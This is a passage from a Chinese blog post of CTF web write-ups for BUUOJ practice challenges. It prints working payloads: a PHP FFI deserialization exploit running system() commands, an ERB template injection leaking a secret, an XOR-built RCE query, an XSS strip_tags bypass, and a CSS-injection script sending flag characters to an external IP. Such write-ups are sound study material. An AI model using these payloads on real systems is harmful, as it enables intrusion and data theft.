$this-&gt;run();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function serialize (): string &#123;</span><br><span class="line">        return serialize($this-&gt;data);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function unserialize($payload) &#123;</span><br><span class="line">        $this-&gt;data &#x3D; unserialize($payload);</span><br><span class="line">        $this-&gt;run();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function __get ($key) &#123;</span><br><span class="line">        return $this-&gt;data[$key];</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function __set ($key, $value) &#123;</span><br><span class="line">        throw new \Exception(&#39;No implemented&#39;);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function __construct () &#123;</span><br><span class="line">        throw new \Exception(&#39;No implemented&#39;);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>分析代码是：PHP7.4新特性：新的自定义对象序列化机制：<a href="https://wiki.php.net/rfc/custom_object_serialization" target="_blank" rel="noopener">关于<strong>serialize和</strong>unserialize</a></p>
<ol start="4">
<li>观察代码，发现对象反序列化时会执行run()方法</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">private function run () &#123;</span><br><span class="line">        $this-&gt;data[&#39;ret&#39;] &#x3D; $this-&gt;data[&#39;func&#39;]($this-&gt;data[&#39;arg&#39;]);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>同时发现可以结合__get魔法函数，获取对象data数组中的元素值</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">public function __get ($key) &#123;</span><br><span class="line">        return $this-&gt;data[$key];</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<ol start="5">
<li>根据题目文件名称提示关注php7.4的新特性，关于<code>opcache.preload</code>，参考这篇文章<a href="https://wiki.php.net/rfc/preload" target="_blank" rel="noopener">https://wiki.php.net/rfc/preload</a> 可知</li>
</ol>
<blockquote>
<p><a href="https://www.php.net/manual/en/opcache.configuration.php#ini.opcache.preload" target="_blank" rel="noopener">opcache.preload</a> 是 <strong>PHP7.4</strong> 中新加入的功能。如果设置了 <a href="https://www.php.net/manual/en/opcache.configuration.php#ini.opcache.preload" target="_blank" rel="noopener">opcache.preload</a> ，那么在所有Web应用程序运行之前，服务会先将设定的 <strong>preload</strong> 文件加载进内存中，使这些 <strong>preload</strong> 文件中的内容对之后的请求均可用。</p>
</blockquote>
<p>在这篇文档尾巴可以看到如下描述：</p>
<blockquote>
<p>In conjunction with ext/FFI (dangerous extension), we may allow FFI  functionality only in preloaded PHP files, but not in regular ones</p>
</blockquote>
<p>大概意思就是说允许在 <strong>preload</strong> 文件中使用 <strong>FFI</strong> 拓展，但是文档中说了 <strong>FFI</strong> 是一个危险的拓展，而这道题目却开启了 <strong>FFI</strong> 拓展。</p>
<p>构造exp如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class A implements Serializable &#123;</span><br><span class="line">    protected $data &#x3D; [</span><br><span class="line">        &#39;ret&#39; &#x3D;&gt; null,</span><br><span class="line">        &#39;func&#39; &#x3D;&gt; &#39;FFI::cdef&#39;,</span><br><span class="line">        &#39;arg&#39; &#x3D;&gt; &#39;int system(const char *command);&#39;</span><br><span class="line">    ];</span><br><span class="line"></span><br><span class="line">    public function serialize (): string &#123;</span><br><span class="line">        return serialize($this-&gt;data);</span><br><span class="line">    &#125;</span><br><span class="line">    public function unserialize($payload) &#123;</span><br><span class="line">        $this-&gt;data &#x3D; unserialize($payload);</span><br><span class="line">        $this-&gt;run();</span><br><span class="line">    &#125;</span><br><span class="line">    public function __construct () &#123;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$a &#x3D; new A();</span><br><span class="line">echo urlencode(serialize($a));</span><br></pre></td></tr></table></figure>

<p>最终payload如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a&#x3D;$a%3dunserialize(&#39;C%3A1%3A%22A%22%3A95%3A%7Ba%3A3%3A%7Bs%3A3%3A%22ret%22%3BN%3Bs%3A4%3A%22func%22%3Bs%3A9%3A%22FFI%3A%3Acdef%22%3Bs%3A3%3A%22arg%22%3Bs%3A32%3A%22int+system%28const+char+%2Acommand%29%3B%22%3B%7D%7D&#39;)-&gt;ret;var_dump($a-&gt;system(&quot;cat%20&#x2F;flag&gt;b.txt&quot;));</span><br></pre></td></tr></table></figure>

<p>最后访问b.txt得到flag</p>
<p>参考资料：</p>
<blockquote>
<p><a href="https://mochazz.github.io/2019/05/21/RCTF2019Web%E9%A2%98%E8%A7%A3%E4%B9%8Bnextphp/#nextphp" target="_blank" rel="noopener">https://mochazz.github.io/2019/05/21/RCTF2019Web%E9%A2%98%E8%A7%A3%E4%B9%8Bnextphp/#nextphp</a></p>
<p><a href="https://blog.csdn.net/qq_41809896/article/details/90384668" target="_blank" rel="noopener">https://blog.csdn.net/qq_41809896/article/details/90384668</a></p>
<p><a href="https://cjm00n.top/CTF/buuoj-writeup-2.html" target="_blank" rel="noopener">https://cjm00n.top/CTF/buuoj-writeup-2.html</a></p>
</blockquote>
<h3 id="0x-06-SCTF2019-Flag-Shop"><a href="#0x-06-SCTF2019-Flag-Shop" class="headerlink" title="0x 06 [SCTF2019]Flag Shop"></a>0x 06 [SCTF2019]Flag Shop</h3><ul>
<li><p>考点</p>
<p>erb模版注入</p>
</li>
<li><p>解题过程</p>
</li>
</ul>
<ol>
<li><p>页面打开是一个购买flag的页面，flag需要1e+27个JinKela才能购买，数量不够。访问robots.txt发现filebak目录，访问得到页面源代码</p>
</li>
<li><p>审计代码发现</p>
</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">get &quot;&#x2F;work&quot; do</span><br><span class="line">  islogin</span><br><span class="line">  auth &#x3D; JWT.decode cookies[:auth],ENV[&quot;SECRET&quot;] , true, &#123; algorithm: &#39;HS256&#39; &#125;</span><br><span class="line">  auth &#x3D; auth[0]</span><br><span class="line">  unless params[:SECRET].nil?</span><br><span class="line">    if ENV[&quot;SECRET&quot;].match(&quot;#&#123;params[:SECRET].match(&#x2F;[0-9a-z]+&#x2F;)&#125;&quot;)</span><br><span class="line">      puts ENV[&quot;FLAG&quot;]</span><br><span class="line">    end</span><br><span class="line">  end</span><br><span class="line"></span><br><span class="line">  if params[:do] &#x3D;&#x3D; &quot;#&#123;params[:name][0,7]&#125; is working&quot; then</span><br><span class="line"></span><br><span class="line">    auth[&quot;jkl&quot;] &#x3D; auth[&quot;jkl&quot;].to_i + SecureRandom.random_number(10)</span><br><span class="line">    auth &#x3D; JWT.encode auth,ENV[&quot;SECRET&quot;] , &#39;HS256&#39;</span><br><span class="line">    cookies[:auth] &#x3D; auth</span><br><span class="line">    ERB::new(&quot;&lt;script&gt;alert(&#39;#&#123;params[:name][0,7]&#125; working successfully!&#39;)&lt;&#x2F;script&gt;&quot;).result</span><br><span class="line"></span><br><span class="line">  end</span><br><span class="line">end</span><br></pre></td></tr></table></figure>

<p>如果传入的do参数和name参数一致，会输出<code>{params[:name][0,7]} working successfully!</code></p>
<p>但是限制了只能输入7个字符，除去&lt;%==&gt;只有两个字符可以利用，这时可以利用ruby全局变量$&amp;，可以获得上一次正则匹配的结果</p>
<p>payload：<code>/work?SECRET=&amp;name=%3c%25%3d%24%27%25%3e&amp;do=%3c%25%3d%24%27%25%3e%20is%20working</code></p>
<p><img src="/2020/04/01/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E5%9B%9B%EF%BC%89/image-20200414232933574.png" alt></p>
<p>成功拿到secret,接着伪造cookie</p>
<p><img src="/2020/04/01/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E5%9B%9B%EF%BC%89/image-20200414233126939.png" alt></p>
<p>回到页面，buy flag，抓包将伪造的cookie写进去，在返回的包里拿到新的cookie，解密得到flag</p>
<p><img src="/2020/04/01/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E5%9B%9B%EF%BC%89/image-20200414233252575.png" alt></p>
<p><img src="/2020/04/01/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E5%9B%9B%EF%BC%89/image-20200414233323947.png" alt></p>
<p>参考资料：</p>
<blockquote>
<p><a href="https://github.com/ev0A/SCTF2019-Flag-Shop/blob/master/Write-Up/write-up.md" target="_blank" rel="noopener">https://github.com/ev0A/SCTF2019-Flag-Shop/blob/master/Write-Up/write-up.md</a></p>
</blockquote>
<h3 id="0x-07-NESTCTF-2019-Love-Math-2"><a href="#0x-07-NESTCTF-2019-Love-Math-2" class="headerlink" title="0x 07 [NESTCTF 2019]Love Math 2"></a>0x 07 [NESTCTF 2019]Love Math 2</h3><ul>
<li><p>考点</p>
<p>php动态特性捕捉</p>
</li>
<li><p>解题过程</p>
</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$payload &#x3D; [‘abs‘, ‘acos‘, ‘acosh‘, ‘asin‘, ‘asinh‘, ‘atan2‘, ‘atan‘, ‘atanh‘,  ‘bindec‘, ‘ceil‘, ‘cos‘, ‘cosh‘, ‘decbin‘ , ‘decoct‘, ‘deg2rad‘, ‘exp‘, ‘expm1‘, ‘floor‘, ‘fmod‘, ‘getrandmax‘, ‘hexdec‘, ‘hypot‘, ‘is_finite‘, ‘is_infinite‘, ‘is_nan‘, ‘lcg_value‘, ‘log10‘, ‘log1p‘, ‘log‘, ‘max‘, ‘min‘, ‘mt_getrandmax‘, ‘mt_rand‘, ‘mt_srand‘, ‘octdec‘, ‘pi‘, ‘pow‘, ‘rad2deg‘, ‘rand‘, ‘round‘, ‘sin‘, ‘sinh‘, ‘sqrt‘, ‘srand‘, ‘tan‘, ‘tanh‘];</span><br><span class="line">for($k&#x3D;1;$k&lt;&#x3D;sizeof($payload);$k++)&#123;</span><br><span class="line">    for($i &#x3D; 0;$i &lt; 9; $i++)&#123;</span><br><span class="line">        for($j &#x3D; 0;$j &lt;&#x3D;9;$j++)&#123;</span><br><span class="line">            $exp &#x3D; $payload[$k] ^ $i.$j;</span><br><span class="line">            echo($payload[$k].&quot;^$i$j&quot;.&quot;&#x3D;&#x3D;&gt;$exp&quot;);</span><br><span class="line">            echo &quot;&lt;br &#x2F;&gt;&quot;;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>最终payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;index.php?c&#x3D;$pi&#x3D;(is_nan^(6).(4)).(tan^(1).(5));$pi&#x3D;$$pi;$pi&#123;0&#125;($pi&#123;1&#125;)&amp;0&#x3D;system&amp;1&#x3D;&lt;command&gt;</span><br></pre></td></tr></table></figure>

<p>参考资料：</p>
<blockquote>
<p><a href="https://www.cnblogs.com/yesec/p/12664136.html" target="_blank" rel="noopener">https://www.cnblogs.com/yesec/p/12664136.html</a></p>
</blockquote>
<h3 id="0x-08-Zer0pts2020-Can-you-guess-it"><a href="#0x-08-Zer0pts2020-Can-you-guess-it" class="headerlink" title="0x 08 [Zer0pts2020]Can you guess it?"></a>0x 08 [Zer0pts2020]Can you guess it?</h3><ul>
<li><p>考点</p>
<p>正则污染绕过、代码审计</p>
</li>
<li><p>解题过程</p>
</li>
</ul>
<ol>
<li>打开题目访问源代码进行审计</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">include &#39;config.php&#39;; &#x2F;&#x2F; FLAG is defined in config.php</span><br><span class="line"></span><br><span class="line">if (preg_match(&#39;&#x2F;config\.php\&#x2F;*$&#x2F;i&#39;, $_SERVER[&#39;PHP_SELF&#39;])) &#123;</span><br><span class="line">  exit(&quot;I don&#39;t know what you are thinking, but I won&#39;t let you read it :)&quot;);</span><br><span class="line">&#125;</span><br><span class="line">&#x2F;&#x2F;$_SERVER[&#39;PHP_SELF&#39;]表示当前php文件相对于网站根目录的位置地址</span><br><span class="line">if (isset($_GET[&#39;source&#39;])) &#123;</span><br><span class="line">  highlight_file(basename($_SERVER[&#39;PHP_SELF&#39;])); &#x2F;&#x2F;basename() 函数返回路径中的文件名部分</span><br><span class="line">  exit();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$secret &#x3D; bin2hex(random_bytes(64));</span><br><span class="line">if (isset($_POST[&#39;guess&#39;])) &#123;</span><br><span class="line">  $guess &#x3D; (string) $_POST[&#39;guess&#39;];</span><br><span class="line">  if (hash_equals($secret, $guess)) &#123;</span><br><span class="line">    $message &#x3D; &#39;Congratulations! The flag is: &#39; . FLAG;</span><br><span class="line">  &#125; else &#123;</span><br><span class="line">    $message &#x3D; &#39;Wrong.&#39;;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>问题出在了basename()函数可以跨目录读取文件，但是需要绕过正则，这里可以用污染绕过，贴一下y1ng师傅的fuzz脚本：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">#!&#x2F;usr&#x2F;bin&#x2F;env python</span><br><span class="line">import requests</span><br><span class="line">for i in range (0,500):</span><br><span class="line">	url &#x3D; &#39;http:&#x2F;&#x2F;814589eb-4094-4449-bf79-39388aa86610.node3.buuoj.cn&#x2F;index.php&#x2F;config.php&#x2F;&#123;&#125;?source&#39;.format(hex(i).replace(&#39;0x&#39;, &#39;%&#39;))</span><br><span class="line">	r &#x3D; requests.get(url)</span><br><span class="line">	print(url)</span><br><span class="line">	if r&quot;flag&quot; in r.text:</span><br><span class="line">		print(r.content)</span><br></pre></td></tr></table></figure>

<p>可以fuzz出很多可以用的参数</p>
<h3 id="0x-09-Zer0pts2020-musicblog"><a href="#0x-09-Zer0pts2020-musicblog" class="headerlink" title="0x 09 [Zer0pts2020]musicblog"></a>0x 09 [Zer0pts2020]musicblog</h3><ul>
<li><p>考点</p>
<p>代码设计、XSS bypass</p>
</li>
<li><p>解题过程</p>
</li>
</ul>
<ol>
<li><p>下载题目附件进行审计，在work.js中发现存在flag且设置在浏览器UA中，后台机器人会点击<code>#like</code>标签<img src="/2020/04/01/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E5%9B%9B%EF%BC%89/image-20200420224644867.png" alt></p>
</li>
<li><p>审计<code>utli.php</code>发现</p>
</li>
</ol>
<p><img src="/2020/04/01/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E5%9B%9B%EF%BC%89/image-20200420225324470.png" alt></p>
<p>字符串会被加载到<code>&lt;audio&gt;</code>标签并解析到页面，输入的内容经过一次strip_tags处理。</p>
<p>没有过滤其他内容，可以在``中插入任意内容，但是受CSP-nonce的限制</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$nonce &#x3D; get_nonce();</span><br><span class="line">header(&quot;Content-Security-Policy: default-src &#39;self&#39;; object-src &#39;none&#39;; script-src &#39;nonce-$&#123;nonce&#125;&#39; &#39;strict-dynamic&#39;; base-uri &#39;none&#39;; trusted-types&quot;);</span><br><span class="line">header(&#39;X-Frame-Options: DENY&#39;);</span><br><span class="line">header(&#39;X-XSS-Protection: 1; mode&#x3D;block&#39;);</span><br></pre></td></tr></table></figure>

<p>而这个<code>strip_tags()</code>存在bug:<a href="https://bugs.php.net/bug.php?id=78814" target="_blank" rel="noopener">https://bugs.php.net/bug.php?id=78814</a></p>
<p><img src="/2020/04/01/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E5%9B%9B%EF%BC%89/image-20200420230614404.png" alt></p>
<p><img src="http://static.zybuluo.com/1160307775/5vrpxpsvcopf7bucy1q2y4h1/image_1e2uhu2v810fc1l7ppa4l41mqm20.png" alt="image_1e2uhu2v810fc1l7ppa4l41mqm20.png-53.5kB"></p>
<p>MusicBlog 中使用的是<code>&lt;audio&gt;</code>作为白名单，<code>&lt;a/udio&gt;</code>可以通过函数处理，并且<code>&lt;a/udio&gt;</code>会作为 超链接<code>&lt;a&gt;</code>被解析</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&gt;&lt;&#x2F;audio&gt;&lt;a&#x2F;udio href&#x3D;&quot;http:&#x2F;&#x2F;http.requestbin.buuoj.cn&#x2F;vtaf6wvt&quot; id&#x3D;&quot;like&quot;&gt;test&lt;&#x2F;a&#x2F;udio&gt;&lt;audio a&#x3D;</span><br></pre></td></tr></table></figure>

<p>经过处理后展开是</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;audio controls src&#x3D;&quot;&quot;&gt;&lt;&#x2F;audio&gt;&lt;a&#x2F;udio href&#x3D;&quot;http:&#x2F;&#x2F;http.requestbin.buuoj.cn&#x2F;vtaf6wvt&quot; id&#x3D;&quot;like&quot;&gt;test&lt;&#x2F;a&#x2F;udio&gt;&lt;audio a&#x3D;&quot;&quot;&gt;&lt;&#x2F;audio&gt;</span><br></pre></td></tr></table></figure>

<p>参考资料：</p>
<blockquote>
<p><a href="https://www.hpdoger.cn/2020/03/10/Zer0pts%202020%20CTF-Web%E9%A2%98%E8%A7%A3/#MusicBlog" target="_blank" rel="noopener">https://www.hpdoger.cn/2020/03/10/Zer0pts%202020%20CTF-Web%E9%A2%98%E8%A7%A3/#MusicBlog</a></p>
<p><a href="https://darkwing.moe/2020/03/10/MusicBlog-zer0pts-CTF-2020/" target="_blank" rel="noopener">https://darkwing.moe/2020/03/10/MusicBlog-zer0pts-CTF-2020/</a></p>
</blockquote>
<h3 id="0x-10-安洵杯-2019-cssgame"><a href="#0x-10-安洵杯-2019-cssgame" class="headerlink" title="0x 10 [安洵杯 2019]cssgame"></a>0x 10 [安洵杯 2019]cssgame</h3><ul>
<li><p>考点</p>
<p>CSS注入</p>
</li>
<li><p>解题过程</p>
</li>
</ul>
<ol>
<li>打开靶机，显示界面如下：</li>
</ol>
<p><img src="/2020/04/01/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E5%9B%9B%EF%BC%89/image-20200421222257298.png" alt></p>
<p>右键查看源代码发现：</p>
<p><img src="/2020/04/01/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E5%9B%9B%EF%BC%89/image-20200421222412267.png" alt></p>
<p>可以看到flag的值就在标签<code>&lt;input&gt;</code>的<code>value</code>属性</p>
<p>然后我们通过靶机发送<code>css</code>参数给内网的flag.html，flag.html接收后将<code>css</code>拼接到：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;link rel&#x3D;&quot;stylesheet&quot; href&#x3D;&quot;$&#123;encodeURI(req.query.css)&#125;&quot; &#x2F;&gt;</span><br></pre></td></tr></table></figure>

<p>通过<strong>css injection</strong>来窃取内网flag值，这里可以参考微笑师傅的文章：<a href="https://www.smi1e.top/%e9%80%9a%e8%bf%87css%e6%b3%a8%e5%85%a5%e7%aa%83%e5%8f%96html%e4%b8%ad%e7%9a%84%e6%95%b0%e6%8d%ae/" target="_blank" rel="noopener">https://www.smi1e.top/%e9%80%9a%e8%bf%87css%e6%b3%a8%e5%85%a5%e7%aa%83%e5%8f%96html%e4%b8%ad%e7%9a%84%e6%95%b0%e6%8d%ae/</a></p>
<p>构造exp如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">import sys</span><br><span class="line"></span><br><span class="line">f &#x3D; open(&quot;poc.css&quot;, &quot;w&quot;)</span><br><span class="line">dic &#x3D; &quot;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789&#123;&#125;-&quot;</span><br><span class="line">for i in dic:</span><br><span class="line">    flag &#x3D; sys.argv[1] + i</span><br><span class="line">    payload &#x3D; &quot;input[name&#x3D;flag][value^&#x3D;\&quot;&quot; + flag + &quot;\&quot;] ~ * &#123;background-image: url(\&quot;http:&#x2F;&#x2F;174.0.108.172:8080&#x2F;?&quot; + flag + &quot;\&quot;);&#125;&quot;</span><br><span class="line">    f.write(payload + &quot;\n&quot;)</span><br><span class="line">f.close()</span><br></pre></td></tr></table></figure>

<p>将<code>css=http://174.0.108.172/poc.css</code>post给<code>crawl.html</code>,在nc监听中可以得到flag</p>
<p>这里环境问题数据可能会传不到内网，需要不停的发包直至收到nc收到请求的信息，坑了我一上午，我裂开了</p>
<p>参考资料：</p>
<blockquote>
<p><a href="https://yanmymickey.github.io/2020/04/17/CTFwp/%5B%E5%AE%89%E6%B4%B5%E6%9D%AF%202019%5Dcssgame/" target="_blank" rel="noopener">https://yanmymickey.github.io/2020/04/17/CTFwp/%5B%E5%AE%89%E6%B4%B5%E6%9D%AF%202019%5Dcssgame/</a></p>
</blockquote>

  </div>
</article>

        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/categories/">Category</a></li>
         
          <li><a href="/tags/">Tag</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-01-PWNHUB-公开赛-2018-傻-fufu-的工作日"><span class="toc-number">1.</span> <span class="toc-text">0x 01 [PWNHUB 公开赛 2018]傻 fufu 的工作日</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-02-WUSTCTF2020-Train-Yourself-To-Be-Godly"><span class="toc-number">2.</span> <span class="toc-text">0x 02 [WUSTCTF2020]Train Yourself To Be Godly</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-03-WUSTCTF2020-easyweb"><span class="toc-number">3.</span> <span class="toc-text">0x 03 [WUSTCTF2020]easyweb</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-04-GWCTF-2019-你的名字"><span class="toc-number">4.</span> <span class="toc-text">0x 04 [GWCTF 2019]你的名字</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-05-RCTF-2019-Nextphp"><span class="toc-number">5.</span> <span class="toc-text">0x 05 [RCTF 2019]Nextphp</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-06-SCTF2019-Flag-Shop"><span class="toc-number">6.</span> <span class="toc-text">0x 06 [SCTF2019]Flag Shop</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-07-NESTCTF-2019-Love-Math-2"><span class="toc-number">7.</span> <span class="toc-text">0x 07 [NESTCTF 2019]Love Math 2</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-08-Zer0pts2020-Can-you-guess-it"><span class="toc-number">8.</span> <span class="toc-text">0x 08 [Zer0pts2020]Can you guess it?</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-09-Zer0pts2020-musicblog"><span class="toc-number">9.</span> <span class="toc-text">0x 09 [Zer0pts2020]musicblog</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x-10-安洵杯-2019-cssgame"><span class="toc-number">10.</span> <span class="toc-text">0x 10 [安洵杯 2019]cssgame</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=http://yoursite.com/2020/04/01/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E5%9B%9B%EF%BC%89/&title=BUUOJ-web刷题（四）" target="_blank" rel="noopener"><i class="fab fa-qq fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://service.weibo.com/share/share.php?url=http://yoursite.com/2020/04/01/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E5%9B%9B%EF%BC%89/&title=BUUOJ-web刷题（四）" target="_blank" rel="noopener"><i class="fab fa-weibo fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://yoursite.com/2020/04/01/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E5%9B%9B%EF%BC%89/&text=BUUOJ-web刷题（四）" target="_blank" rel="noopener"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=BUUOJ-web刷题（四）&body=Check out this article: http://yoursite.com/2020/04/01/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E5%9B%9B%EF%BC%89/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy; 2020 John Doe 
    <a href="http://www.beian.miit.gov.cn/" target="_blank">湘ICP备17005082号</a>
    
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/categories/">Category</a></li>
         
          <li><a href="/tags/">Tag</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </nav>
  </div>
  
  <div class="footer-custom">
    Framework by <a href="https://hexo.io" target="_blank">Hexo</a> & Theme by <a href="https://github.com/xuthus5/hexo-theme-cactus" target="_blank">Cactus-CN</a> & CDN provided by
     
      <a href="https://www.upyun.com/?utm_source=lianmeng&utm_medium=referral" target="_blank">
        <img class="img-response" src="/images/upyun.png" alt="cdn image">
      </a>
    
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/5.12.1/css/all.min.css">


<link rel="stylesheet" href="https://cdn.staticfile.org/justifiedGallery/3.7.0/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js"></script>


<script src="https://cdn.staticfile.org/justifiedGallery/3.7.0/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight .code pre").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      target: function(trigger) {
